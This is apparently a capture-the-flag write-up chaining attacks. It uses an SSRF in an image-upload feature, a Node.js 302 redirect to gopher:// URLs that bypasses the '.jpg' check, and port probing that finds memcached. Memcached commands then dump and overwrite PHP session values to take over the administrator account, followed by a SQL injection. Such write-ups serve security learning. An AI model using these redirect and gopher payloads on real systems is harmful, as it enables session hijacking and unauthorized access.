the upload module could get content from external URL

so that it may use curl or file_get_contents function , if the URL is not checked , then it turns into a SSRF vuln

for URL , it could only end with .jpg

but we could use 302 redirection

nodeJS

1
2
3
response.writeHead(302, {
'Location': 'gopher://127.0.0.1:80/'
});

fisrt i tried file:// php:// scheme but failed

so that it may be use curl

then i use gopher scheme to detect which port is open

as i guessed,port 11211 is open, and the memcached server could be exploited by local user

now we could try to build an attack chain

1
2
3
gopher://127.0.0.1:11211/_stats%20items%0d%0a
stats item xxx
stats cachedump 5 100

it shows the value of session,and we know that php use memcached to save session

pic1

use

1
set key flags exptime bytes

then we get into administrator’s account

pic2

but we could not get the flag since it shows a notification

pic3

see the html sourcecode and find the backup code

pic4

absolutely there is a SQL injection vuln

pic5

and finally capture the flag